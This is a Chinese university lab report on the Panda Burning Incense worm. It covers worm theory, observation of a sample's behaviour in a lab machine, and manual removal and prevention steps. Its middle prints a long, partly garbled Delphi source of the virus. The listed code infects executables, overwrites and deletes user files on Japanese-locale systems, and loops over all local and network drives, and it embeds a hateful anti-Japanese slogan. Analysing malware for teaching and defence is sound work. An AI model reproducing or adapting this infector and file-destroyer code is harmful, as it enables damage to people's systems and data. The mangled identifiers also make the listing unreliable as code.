信息安全-熊猫烧香病毒剖析.doc

资源描述

《网络攻击与防御》实验报告计算机科学与技术学院计算机系网络教研室制课程名称：信息安全原理与实践实验名称：熊猫烧香病毒剖析实验成绩：实验报告撰写要求实验操作是教学过程中理论联系实际的重要环节，而实验报告的撰写又是知识系统化的吸收和升华过程，因此，实验报告应该体现完整性、规范性、正确性、有效性。现将实验报告撰写的有关内容说明如下： 1、实验报告模板为电子版。 2、下载统一的实验报告模板，学生自行完成撰写和打印。报告的首页包含本次实验的一般信息： l l 组号：例如：2-5 表示第二班第5组。 l l 实验日期：例如：05-10-06 表示本次实验日期。(年-月-日)…… l l 实验编号：例如：No.1 表示第一个实验。 l l 实验时间：例如：2学时表示本次实验所用的时间。实验报告正文部分，从六个方面（目的、内容、步骤等）反映本次实验的要点、要求以及完成过程等情况。模板已为实验报告正文设定统一格式，学生只需在相应项内填充即可。续页不再需要包含首页中的实验一般信息。 3、实验报告正文部分具体要求如下：一、实验目的本次实验所涉及并要求掌握的知识点。二、实验环境实验所使用的设备名称及规格，网络管理工具简介、版本等。三、实验内容与实验要求实验内容、原理分析及具体实验要求。四、实验过程与分析根据具体实验，记录、整理相应命令、运行结果等，包括截图和文字说明。详细记录在实验过程中发生的故障和问题，并进行故障分析，说明故障排除的过程及方法。五、实验结果总结对实验结果进行分析，完成思考题目，总结实验的心得体会，并提出实验的改进意见。六、附录信息安全熊猫烧香病毒剖析一、实验目的 1）掌握熊猫烧香病毒的工作原理和感染方法； 2）掌握手工清除熊猫病毒的基本方法。二、实验环境目标主机为windows-2003 所用到的工具 o Wsyscheck 三、实验内容与实验要求蠕虫原理 1）蠕虫定义 2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。这一病毒利用了微软视窗操作系统的漏洞，计算机感染这一病毒后，会不断自动拨号上网，并利用文件中的地址信息或者网络共享进行传播，最终破坏用户的大部分重要数据。蠕虫病毒是自包含的程序(或是一套程序)，它能传播它自身功能的拷贝或它的某些部分到其他的计算机系统中(通常是经过网络连接)。请注意，与一般病毒不同，蠕虫不需要将其自身附着到宿主程序，有两种类型的蠕虫：主机蠕虫与网络蠕虫。主计算机蠕虫完全包含在它们运行的计算机中，并且使用网络的连接仅将自身拷贝到其他的计算机中，主计算机蠕虫在将其自身的拷贝加入到另外的主机后，就会终止它自身(因此在任意给定的时刻，只有一个蠕虫的拷贝运行)，这种蠕虫有时也叫"野兔"。蠕虫一般不采取利用pe格式插入文件的方法，而是复制自身在互联网环境下进行传播，病毒的传染能力主要是针对计算机内的文件系统而言，而蠕虫病毒的传染目标是互联网内的所有计算机。局域网条件下的共享文件夹，电子邮件email，网络中的恶意网页，大量存在着漏洞的服务器等都成为蠕虫传播的良好途径。蠕虫和传统病毒的区别： · 传统病毒主要攻击的是文件系统，在其传染的过程中，计算机使用者是传染的触发者，是传染的关键环节，使用者计算机知识水平的高低常常决定了传统病毒所能造成的破坏程度； · 蠕虫主要是利用计算机系统漏洞进行传染，在搜索到网络中存在漏洞的计算机后，主动进行攻击。在传染的过程中，与计算机操作者是否进行操作无关，从而与使用者的计算机知识水平无关。 2）蠕虫的基本程序结构 · 传播模块：负责蠕虫的传播，通过检查主机或远程计算机的地址库，找到可进一步传染的其他计算机。 · 隐藏模块：侵入主机后，隐藏蠕虫程序，防止被用户发现。 · 目的功能模块：实现对计算机的控制、监视或破坏等功能。传播模块由可以分为三个基本模块：扫描模块、攻击模块和复制模块。蠕虫程序功能模型也可以扩展为如下的形式： 3）蠕虫程序的一般传播过程 · 扫描：由蠕虫的扫描功能模块负责探测存在漏洞的主机。当程序向某个主机发送探测漏洞的信息并收到成功的反馈信息后，就得到一个可传播的对象。 · 攻击：攻击模块按漏洞攻击步骤自动攻击步骤1中找到的对象，取得该主机的权限（一般为管理员权限），获得一个shell。 · 复制：复制模块通过原主机和新主机的交互将蠕虫程序复制到新主机并启动。蠕虫将自身复制到某台计算机之前，也会试图判断该计算机以前是都已被感染过。在分布式系统中，蠕虫可能会以系统程序名或不易被操作系统察觉的名字来为自己命名，从而伪装自己。同时，我们也可以看到，传播模块实现的实际上是自动入侵的功能。所以蠕虫的传播技术是蠕虫技术的首要技术，没有蠕虫的传播技术，也就谈不上什么蠕虫技术了。 “熊猫烧香”蠕虫病毒 1）“熊猫烧香”档案又名：尼亚姆、武汉男生、worm.whBoy、worm.nimaya 后又化身为：“金猪报喜” 病毒类型：蠕虫病毒影响系统：Windows 9X/ME/NT/2000/XP/2003/Vista/7 2）“熊猫烧香”病毒特点 2006年底，我国互联网上大规模爆发“熊猫烧香”病毒及其变种，该病毒通过多种方式进行传播，同时该病毒还具有盗取用户游戏账号、QQ账号等功能。该病毒传播速度快，危害范围广，截至案发为止，已有上百万个人用户、网吧及企业局域网用户遭受感染和破坏，引起社会各界高度关注。《瑞星2006安全报告》将其列为十大病毒之首，在《2006年度中国计算机病毒疫情和互联网安全报告》的十大病毒排行中一举成为“毒王”。 “熊猫烧香”，是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件，使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。 “熊猫烧香”源码分析含有病毒体的文件被运行后，病毒将自身复制至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该磁盘时激活病毒体。随后病毒体创建一个线程进行本地文件感染，同时创建另外一个线程连接网站下载DOS程序发动恶意攻击。下面，我们分析一下用delphi语言描述的“熊猫烧香”的主要源代码： program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; const HeaderSize = 82432; //病毒体的大小 IconOffset = $12EB8; //PE文件主图标的偏移量 //查找2800000020的十六进制字符串可以找到主图 //标的偏移量 { HeaderSize = 38912; //Upx压缩过病毒体的大小 IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量 //Upx 1.24W 用法: upx -9 --8086 Japussy.exe } IconSize = $2E8; //PE文件主图标的大小--744字节 IconTail = IconOffset + IconSize; //PE文件主图标的尾部 ID = $44444444; //感染标记 //垃圾码，以备写入 Catchword = 'If a race need to be killed out, it must be Yamato. ' + 'If a country need to be destroyed, it must be Japan! ' + '*** W32.Japussy.Worm.A ***'; {$R *.RES} function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'Kernel32.dll';//函数声明 var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; //日文操作系统标记 { ===============判断是否为Win9x================ } function IsWin9x: Boolean; var Ver: TOSVersionInfo; begin Result := False; Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if not GetVersionEx(Ver) then Exit; if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x Result := True; end; {=======================在流之间复制======================== } procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer); var sCurPos, dCurPos: Integer; begin sCurPos := Src.Position; dCurPos := Dst.Position; Src.Seek(sStartPos, 0); Dst.Seek(dStartPos, 0); Dst.CopyFrom(Src, Count); Src.Seek(sCurPos, 0); Dst.Seek(dCurPos, 0); end; {==========将宿主文件从已感染的PE文件中分离出来，以备使用====== } procedure Extract: string); var sStream, dStream: T; begin try sStream := T(ParamStr(0), fmOpenRead or fmShareDenyNone); try dStream := T(, fmCreate); try sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分 dStream.CopyFrom(sStream, sStream.Size - HeaderSize); finally dStream.Free; end; finally sStream.Free; end; except end; end; {===================填充STARTUPINFO结构================== } procedure FillStartupInfo(var Si: STARTUPINFO; State: Word); begin Si.cb := SizeOf(Si); Si.lpReserved := nil; Si.lpDesktop := nil; Si.lpTitle := nil; Si.dwFlags := STARTF_USESHOWWINDOW; Si.wShowWindow := State; Si.cbReserved2 := 0; Si.lpReserved2 := nil; end; {======================发带毒邮件==================== } procedure SendMail; //此处省略了带危害性代码 begin end; {======================感染PE文件==================== } procedure InfectOne: string); var HdrStream, SrcStream: T; IcoStream, DstStream: TMemoryStream; iID: LongInt; aIcon: TIcon; Infected, IsPE: Boolean; i: Integer; Buf: array[0..1] of Char; begin try//出错则文件正在被使用，退出 if CompareText(, 'JAPUSSY.EXE') = 0 then //是自己则不感染 Exit; Infected := False; IsPE := False; SrcStream := T(, fmOpenRead); try for i := 0 to $108 do//检查PE文件头 begin SrcStream.Seek(i, soFromBeginning); SrcStream.Read(Buf, 2); if (Buf[0] = #80) and (Buf[1] = #69) then//PE标记 begin IsPE := True; //是PE文件 Break; end; end; SrcStream.Seek(-4, soFromEnd);//检查感染标记 SrcStream.Read(iID, 4); if (iID = ID) or (SrcStream.Size< 10240) then //太小的文件不感染 Infected := True; finally SrcStream.Free; end; if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出 Exit; IcoStream := TMemoryStream.Create; DstStream := TMemoryStream.Create; try aIcon := TIcon.Create; try //得到被感染文件的主图标(744字节)，存入流 aIcon.ReleaseHandle; aIcon.Handle := ExtractIcon(HInstance, PChar(), 0); aIcon.SaveToStream(IcoStream); finally aIcon.Free; end; SrcStream := T(, fmOpenRead); //头文件 HdrStream := T(ParamStr(0), fmOpenRead or fmShareDenyNone); try //写入病毒体主图标之前的数据 CopyStream(HdrStream, 0, DstStream, 0, IconOffset); //写入目前程序的主图标 CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize); //写入病毒体主图标到病毒体尾部之间的数据 CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail); //写入宿主程序 CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size); //写入已感染的标记 DstStream.Seek(0, 2); iID := $44444444; DstStream.Write(iID, 4); finally HdrStream.Free; end; finally SrcStream.Free; IcoStream.Free; DstStream.SaveTo); //替换宿主文件 DstStream.Free; end; except; end; end; {===================将目标文件写入垃圾码后删除==================} procedure Smash: string); var : Integer; i, Size, Mass, Max, Len: Integer; begin try Set(PChar(), 0);//去掉只读属性 := (, fmOpenWrite); //打开文件 try Size := Get(, nil);//文件大小 i := 0; Randomize; Max := Random(15); //写入垃圾码的随机次数 if Max < 5 then Max := 5; Mass := Size div Max; //每个间隔块的大小 Len := Length(Catchword); while i< Max do begin (, i * Mass, 0);//定位 //写入垃圾码，将文件彻底破坏掉 (, Catchword, Len); Inc(i); end; finally ();//关闭文件 end; Delete());//删除之 except end; end; {====================获得可写的驱动器列表==================} function GetDrives: string; var DiskType: Word; D: Char; Str: string; i: Integer; begin for i := 0 to 25 do //遍历26个字母 begin D := Chr(i + 65); Str := D + ':\'; DiskType := GetDriveType(PChar(Str)); //得到本地磁盘和网络盘 if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then Result := Result + D; end; end; {====================遍历目录，感染和摧毁文件===================} procedure LoopFiles(Path, Mask: string); var i, Count: Integer; Fn, Ext: string; SubDir: TStrings; SearchRec: TSearchRec; Msg: TMsg; function IsValidDir(SearchRec: TSearchRec): Integer; begin if (SearchRec.Attr<> 16) and (SearchRec.Name<> '.') and (SearchRec.Name<> '..') then Result := 0//不是目录 else if (SearchRec.Attr = 16) and (SearchRec.Name<> '.') and (SearchRec.Name<> '..') then Result := 1 //不是根目录 else Result := 2; //是根目录 end; begin if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then begin repeat PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列，避免引起怀疑 if IsValidDir(SearchRec) = 0 then begin Fn := Path + SearchRec.Name; Ext := UpperCase(Extract(Fn)); if (Ext = '.EXE') or (Ext = '.SCR') then begin InfectOne);//感染可执行文件 end else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then begin //感染HTML和ASP文件，将Base64编码后的病毒写入 //感染浏览此网页的所有用户 end else if Ext = '.WAB' then //Outlook地址簿文件 begin //获取Outlook邮件地址 end else if Ext = '.ADC' then //Foxmail地址自动完成文件 begin //获取Foxmail邮件地址 end else if Ext = 'IND' then //Foxmail地址簿文件 begin //获取Foxmail邮件地址 end else begin if IsJap then begin if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then Smash); //摧毁文件 end; end; end; //感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑 Sleep(200); until (FindNext(SearchRec) <> 0); end; FindClose(SearchRec); SubDir := TStringList.Create; if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then begin repeat if IsValidDir(SearchRec) = 1 then SubDir.Add(SearchRec.Name); until (FindNext(SearchRec) <> 0); end; FindClose(SearchRec); Count := SubDir.Count - 1; for i := 0 to Count do LoopFiles(Path + SubDir.Strings + '\', Mask); FreeAndNil(SubDir); end; //子过程是对典型遍历本机中所有可用盘中所有子目录下的所有子目录下的所有文件实施相应操作的编码。在确定当前文件为可执行文件（仅针对.exe和.scr文件）后，调用子过程InfectOneFile进行特定的感染。 {====================遍历磁盘上所有的文件==================== } procedure InfectFiles; var DriverList: string; i, Len: Integer; begin if GetACP = 932 then//日文操作系统 IsJap := True; DriverList := GetDrives;//得到可写的磁盘列表 Len := Length(DriverList); while True do//死循环 begin for i := Len downto 1 do //遍历每个磁盘驱动器 LoopFiles(DriverList + ':\', '*.*');//感染之 SendMail;//发带毒邮件 Sleep(1000 * 60 * 5);//睡眠5分钟 end; end; // 核心是后面的死循环。先分析较简单的“发带毒邮件”部分，从后面病毒具体遍历用磁盘并执行具体感染过程可知，在此过程中，它会取得安装在本机中的常用邮件客户端程序（outlook，foxmail）相应电子邮件信息。其目的是，取得重要邮箱地址及相应密码，然后向这些邮件地址群发带毒的电子邮件，从而达到利用网络传播自身的目的。 {=======================主程序开始=========================} begin if IsWin9x then//是Win9x RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程 else//WinNT begin //远程线程映射到Explorer进程 end; //如果是原始病毒体自己 if CompareText(Extract(ParamStr(0)), 'Japussy.exe') = 0 then Infect感染和发邮件 else //已寄生于宿主程序上了，开始工作 begin Tmp ParamStr(0); //创建临时文件 Delete(TmpFile, Length(TmpFile) - 4, 4); Tmp TmpFile + #32 + '.exe';//真正的宿主文件，多一个空格 Extract); FillStartupInfo(Si, SW_SHOWDEFAULT); CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, 0, nil, '.', Si, Pi);//创建新进程运行之 InfectFiles; //感染和发邮件 end; end. 通过分析，不难绘出“熊猫烧香”病毒相应的执行流程，如下图所示。四、实验过程与分析 “熊猫烧香”病毒主要行为分析通过病毒分析实验室工具，对“熊猫烧香”病毒主要行为进行分析。在本次实验中，为了方便观察，运行“熊猫烧香”程序将不改变其他文件的图标。 1，我们打开桌面上的实验工具，找到熊猫烧香的病毒样本。如下图所示： 2，运行该程序，“熊猫烧香”病毒感染系统中的.exe、.com、.pif、.src、.html、.asp等文件，我们可以通过对“熊猫烧香”样本运行情况进行跟踪，打开HA_文件，可以先将文件保存为log文件，之后用记事本打开查看，跟踪“熊猫烧香”病毒样本spcolsv.exe对系统文件修改的行为展示，如下图所示。 3，现在“熊猫烧香”已经彻底感染了这台电脑，我们下面观察一下，它会带来哪些症状。它尝试关闭多个安全软件，即天网防火墙进程、VirusScan网镖杀毒、金山毒霸、瑞星、江民、黄山IE、超级兔子、优化大师、木马克星、木马清道夫、QQ病毒、注册表编辑器、系统配置实用程序、卡巴斯基反病毒、Symantec AntiVirus、Dubaesteemproces、绿鹰PC密码防盗、噬菌体、木马辅助查找器、System Safety Monitor、Wrapped gift Killer、Winsock Expert、游戏木马检测大师、msctls_statusbar32、pjf(ustc)、IceSword等。 4，尝试结束安全软件相关进程，即Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe。我们打开桌面上“安装包”文件夹，找到瑞星的安装程序，尝试安装，会发现无法安装成功，如下图所示。 5，尝试打开任务管理器，我们发现任务管理器打开之后会迅速自动关闭。 6，点击菜单“开始”，选择“运行”，输入regedit，尝试打开注册表，会发现，注册表打开之后也迅速自动关闭。 7，打开“我的电脑”，双击本地磁盘C盘，会发现无法打开，同时，右键，会发现右键菜单中多了一个“Auto”选项。 8，打开菜单“工具”，打开“文件夹选项”，选择“显示所有文件和文件夹”，选择“确定”。如下图所示。之后，我们重新打开，查看刚才我们的修改是否成功，发现刚才的修改失败。如下图所示。 9，打开桌面上wsyscheck.exe，这是一款系统检测维护工具，可以进行进程和服务驱动的检查，SSDT强化检测，文件查询，注册表操作，DOS删除等操作。打开wsyscheck的进程管理，我们可以看见系统打开了哪些进程，我们可以看见spcolsv.exe正在运行，我们定位它的位置，可以发现，“熊猫烧香”已经将自身复制到了系统目录C:\WINDOWS\system32\drivers\spcolsv.exe下，如下图所示。 10，我们继续打开“文件管理”框，在C盘下，我们可以看见隐藏了的“熊猫烧香”的安装程序setup.exe以及autorun.inf文件。如下图所示。我们可以打开autorun.inf查看里面写入的内容，表明当双击C盘时，setup.exe将自动运行。 11，观察病毒创建启动项[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]svcshare=% system32%\drivers\spcolsv.exe情况，如下图所示。 12，病毒修改了注册表中“显示所有文件和文件夹”的设置内容：[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Advanced\Folder\Hidder\SHOWALL]分支下的“CheckedValue”的键值设为“dword：”。如下图所示。任务二实验步骤二 “熊猫烧香”病毒手工清除 1，结束病毒进程。使用刚才介绍的工具wsyscheck，打开“进程管理”，找到spcolsv.exe，右键选择“结束进程并删除文件”。 2，删除根目录下的病毒文件： X:\setup.exe X:\autorun.inf 切换到“文件管理”，找到“熊猫烧香”的安装程序setup.exe，右键选择直接删除，同样直接删除该目录下的autorun.inf文件， 3，删除病毒启动项。切换到“注册表管理”，找到[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]svcshare，右键删掉该值。 4，恢复被修改的“显示所有文件和文件夹”设置。[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Advanced\Folder\Hidder\SHOWALL]分支下的“CheckedValue”的键值设为“dword：”。 5，恢复或重新安装被破坏的软件。 6，通过上面的措施，接下来验证一下，现在能否打开任务管理器以及注册表，打开方式详见任务一。如下图所示，我们现在可以成功打开注册表和任务管理器。 7，接下来，清空回收站，我们打开我的电脑，双击C盘，发现仍然不能打开，这个时候，需要重新启动计算机。 8，重启之后，我们右键C盘，发现仍然存在如下图所示的情况。这时，我们只需要按照步骤1至步骤4重新设置一遍，然后再一次重启。 9，再次重启之后，这个时候我们就可以打开C盘了。如下图所示。接下来我们就可以对系统重新安装杀毒软件，对系统进行全面的查杀。（桌面上NimayaKiller.scr是一款熊猫烧香的专杀工具，大家可以随时利用该工具清理电脑中的“熊猫烧香”病毒）五、实验结果总结实验结果截图以下为未感染病毒前的注册表及任务管理器感染病毒后无法安装瑞星杀毒软件任务管理器闪退 C盘出现Auto，并无法打开任务管理器可以显示重启后发现C盘可以打开，AUTO消失病毒删除成功，实验完成。心得体会如何防范“熊猫烧香”病毒？ “熊猫烧香”病毒不但可以对用户系统进行破坏，导致大量应用软件无法使用，而且还可删除扩展名为gho的所有文件，造成用户的系统备份文件丢失，从而无法进行系统恢复；同时该病毒还能终止大量反病毒软件进程，大大降低用户系统的安全性。这几天“熊猫烧香”的变种更是表象异常活跃，近半数的网民深受其害。对于已经感染“熊猫烧香”病毒的用户，建议参考《熊猫烧香病毒专杀及手动修复方案》，下载其中的专钉工具进行查杀，也可手动查杀。技术专家还总结了以下预防措施，帮你远离“熊猫烧香”病毒的骚扰。 1、立即检查本机administrator组成员口令，一定放弃简单口令甚至空口令，安全的口令是字母数字特殊字符的组合，自己记得住，别让病毒猜到就行。修改方法：右键单击“我的电脑”，选择管理，浏览到本地用户和组，在右边的窗中，选择具备管理员权限的用户名，单击右键，选择设置密码，输入新密码就行。 2.、利用组策略，关闭所有驱动器的自动播放功能。步骤：单击开始，运行，输入gpedit.msc，打开组策略编辑器，浏览到计算机配置，管理模板，系统，在右边的窗格中选择关闭自动播放，该配置缺省是未配置，在下拉框中选择所有驱动器，再选取已启用，确定后关闭。最后，在开始，运行中输入gpupdate，确定后，该策略就生效了。 3、修改文件夹选项，以查看不明文件的真实属性，避免无意双击骗子程序中毒。步骤：打开资源管理器（按windows徽标键＋E），点工具菜单下文件夹选项，再点查看，在高级设置中，选择查看所有文件，取消隐藏受保护的操作系统文件，取消隐藏文件扩展名。 4、时刻保持操作

展开阅读全文